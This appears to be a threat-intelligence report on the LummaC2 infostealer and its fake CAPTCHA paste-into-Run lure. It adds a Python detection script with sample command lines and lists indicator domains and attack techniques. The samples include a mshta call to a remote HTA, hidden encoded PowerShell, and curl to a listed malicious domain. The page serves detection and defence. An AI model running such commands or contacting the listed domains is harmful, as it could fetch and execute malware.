Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page
Jan. 13, 2025, 4:45 p.m.
Description
A new distribution method for the LummaC2 infostealer has been identified that relies on a fake CAPTCHA verification page. The chain starts with a counterfeit "I'm not a robot" check: clicking it silently copies a malicious command to the clipboard, and the victim is then prompted to paste and run it (typically in the Windows Run dialog). No software vulnerability is exploited; the whole chain depends on user execution. The pasted command launches an obfuscated HTA file, which in turn runs an encrypted PowerShell script that delivers the final payload, LummaC2. LummaC2 steals browser-stored data and cryptocurrency information, and it also carries a ClipBanker module that monitors the clipboard and replaces cryptocurrency wallet addresses it finds there. The fake CAPTCHA pages are mostly reached from download pages for cracked software and from phishing emails, so unfamiliar sources warrant caution, and any web page that asks the user to paste a command into the Run dialog should be treated as malicious.
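Because the chain depends on the victim running a pasted command, it leaves a recognisable process-creation trail: mshta.exe spawned by explorer.exe with a remote URL, followed by hidden, encoded PowerShell. The following is an added example, not code from the original report or from any tool it describes: a small Python hunt over constructed Sysmon-style process-creation records. The record layout (pipe-separated key=value fields), the host hta.example.invalid, the file paths and the Base64 blob are all invented for the example; only the three domains come from this page's Indicators list.

```python
import re
from dataclasses import dataclass, field

# Domains from this page's Indicators list, used below as a plain IOC match.
PAGE_DOMAINS = ("cc.klipjaqemiu.shop", "klipjaqemiu.shop", "noisercluch.click")

# Constructed process-creation records (Sysmon-style fields, pipe-separated).
# URLs, paths and the Base64 blob are invented; only the domains come from the page.
SAMPLE_EVENTS = [
    # 1: command pasted into Win+R, so explorer.exe is the parent; mshta fetches a remote HTA
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta https://hta.example.invalid/verify.hta",
    # 2: stage two launched by the HTA: hidden, encoded PowerShell
    "ParentImage=C:\\Windows\\System32\\mshta.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -ep bypass -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA=",
    # 3: benign control record
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe"
    "|CommandLine=notepad.exe C:\\Users\\u\\notes.txt",
    # 4: a plain-text command line that names one of the page's indicator domains
    "ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|Image=C:\\Windows\\System32\\curl.exe"
    "|CommandLine=curl.exe -s https://noisercluch.click/",
]


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    findings: list = field(default_factory=list)


def parse_event(line: str) -> ProcEvent:
    """Parse one 'Key=Value|Key=Value' record (the constructed layout used here)."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


_REMOTE_URL = re.compile(r"https?://", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match the short forms too.
_PS_ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
# Likewise -w / -win / -windowstyle hidden.
_PS_HIDDEN = re.compile(r"-w[a-z]*\s+hidden", re.I)


def inspect(ev: ProcEvent) -> ProcEvent:
    """Attach findings describing why this record looks like the fake-CAPTCHA chain."""
    img, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.command_line
    if img == "mshta.exe" and _REMOTE_URL.search(cmd):
        ev.findings.append("mshta.exe launched with a remote URL (HTA fetched from the web)")
    if img in ("powershell.exe", "pwsh.exe"):
        if _PS_ENCODED.search(cmd):
            ev.findings.append("PowerShell -EncodedCommand payload (T1059.001, T1027)")
        if _PS_HIDDEN.search(cmd):
            ev.findings.append("PowerShell run with a hidden window")
    # A pasted Win+R command runs as a direct child of explorer.exe.
    if ev.findings and parent == "explorer.exe":
        ev.findings.append("parent is explorer.exe, consistent with a command pasted into Win+R (T1204.001)")
    hits = [d for d in PAGE_DOMAINS if d in cmd.lower()]
    if hits:
        ev.findings.append("indicator domain in command line: " + ", ".join(hits))
    return ev


def hunt(lines):
    """Return only the records that produced at least one finding."""
    return [ev for ev in (inspect(parse_event(l)) for l in lines) if ev.findings]


if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print(_basename(ev.parent_image), "->", _basename(ev.image))
        for f in ev.findings:
            print("   ", f)
```

The explorer.exe parent check is the part worth keeping even if the LOLBin changes: legitimate software almost never runs mshta or encoded PowerShell straight from the shell, whereas every paste-into-Run lure does. The domain match is only useful for as long as the listed infrastructure stays live, so treat it as a supplement to the behavioural checks rather than the main signal.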
Date
Published: Jan. 13, 2025, 4:41 p.m.
Created: Jan. 13, 2025, 4:41 p.m.
Modified: Jan. 13, 2025, 4:45 p.m.
Indicators
d734e7c79310f56620a9243f1e3418e15fb507dec460b801eb0e14a7baa145c5
cc.klipjaqemiu.shop
noisercluch.click
klipjaqemiu.shop
Attack Patterns
LummaC2
T1102.002 Web Service: Bidirectional Communication
T1573.001 Encrypted Channel: Symmetric Cryptography
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
T1204.001 User Execution: Malicious Link
T1059.001 Command and Scripting Interpreter: PowerShell
T1566.002 Phishing: Spearphishing Link
T1056.001 Input Capture: Keylogging
T1555 Credentials from Password Stores
T1566.001 Phishing: Spearphishing Attachment
T1027 Obfuscated Files or Information